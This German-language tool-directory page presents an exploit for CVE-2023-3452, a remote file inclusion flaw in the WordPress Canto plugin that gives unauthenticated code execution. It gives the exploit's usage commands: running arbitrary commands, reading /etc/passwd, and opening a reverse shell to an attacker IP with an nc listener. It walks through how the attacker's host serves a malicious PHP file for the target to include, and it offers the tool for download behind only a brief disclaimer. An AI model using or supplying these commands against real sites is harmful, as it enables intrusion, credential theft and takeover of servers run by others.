Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — CVE-2023-3452 Exploit für WordPress Canto Plugin RCE, inklusive HTTPS-Unterstützung | Kitploit
Tools/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

CVE-2023-3452 Exploit für WordPress Canto Plugin RCE, inklusive HTTPS-Unterstützung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5 MonatenNoch nicht geprüft

CVE-2023-3452 - WordPress Canto Plugin RCE

Exploit für das WordPress Canto Plugin (≤ 3.0.4) RFI-Schwachstelle. Funktioniert tatsächlich mit HTTPS — die anderen öffentlichen PoCs haben bei SSL aufgegeben.

Anerkennung wo sie gebührt: Dieses CVE wurde von anderen gefunden. Ich habe nur eine Version erstellt, die bei HTTPS-Zielen nicht versagt.

Sicherheitslücke

CVECVE-2023-3452
EDB-ID51826
TypRemote File Inclusion (RFI) → Nicht authentifizierte RCE
BetroffenWordPress Canto Plugin < 3.0.5 (≤ 3.0.4)
Entdeckt vonLeopoldo Angulo (leoanggal1) — 2024-02-27
Ort/wp-content/plugins/canto/includes/lib/download.php
Vektorwp_abspath wird verwendet, um PHP-Dateien ohne Validierung einzubinden — wir binden unsere remote ein.

Warum dieses?

Die meisten Exploits für dieses CVE scheitern an HTTPS wegen SSL-Verifikation. Dieses Skript:

  • Verwendet verify=False, sodass HTTPS-Ziele tatsächlich funktionieren
  • Unterdrückt die urllib3-Warnungsflut
  • Läuft sowohl auf HTTP als auch HTTPS gleich — keine separate Konfiguration erforderlich

Voraussetzungen

  • Python 3.6+
  • requests

Installation

root@kitploit:~
pip install -r requirements.txt

Oder einfach: pip install requests

Verwendung

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

Argumente

* Kein Befehl = führt id; whoami; hostname als Sicherheitsprüfung aus

Beispiele

Einzelbefehl:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

Eine Datei lesen:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse Shell (führen Sie zuerst nc -lvnp 4444 aus):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Interaktiver Modus:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS CTF-Ziel:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Wie es funktioniert

  1. Prüfung — Greift auf /wp-content/plugins/canto/readme.txt zu, parst die Version (≤ 3.0.4 = anfällig)
  2. Payload — Schreibt eine gefälschte wp-admin/admin.php, die Ihren Befehl via system() ausführt
  3. Bereitstellung — Startet einen lokalen HTTP-Server, damit das Ziel unsere Datei abrufen kann
  4. Auslösung — Fordert download.php mit wp_abspath=http://LHOST:LPORT an, sodass es unser entferntes PHP einbindet
  5. Ausführung — Der Server des Ziels führt unseren Code aus, wir erhalten die Ausgabe zurück

Netzwerkhinweise

  • Das Ziel muss Ihren Rechner unter LHOST:LPORT erreichen können (für HTB/Labs ist das Ihre VPN-IP)
  • Die Firewall muss eingehende Verbindungen auf dem Payload-Port (-p) zulassen

Haftungsausschluss

Nur autorisierte Tests und Ausbildung. Berühren Sie nur Systeme, zu denen Sie berechtigt sind. Alles andere ist illegal.

Lizenz

MIT

Tool herunterladen
OptionBeschreibungErforderlich
-t, --targetZiel-WordPress-URL (HTTP oder HTTPS)Ja
-l, --lhostIhre IP — das Ziel muss diese für das Payload erreichen könnenJa
-p, --lportPayload-Server-Port (Standard: 8888)Nein
-c, --commandBefehl, der auf dem Ziel ausgeführt werden sollNein*
--revshellReverse-Shell startenNein
--shell-portListener-Port für Reverse-Shell (Standard: 4444)Nein
-i, --interactiveInteraktiver Shell-ModusNein
-v, --verboseZusätzliche AusgabeNein
--skip-checkSchwachstellenprüfung überspringenNein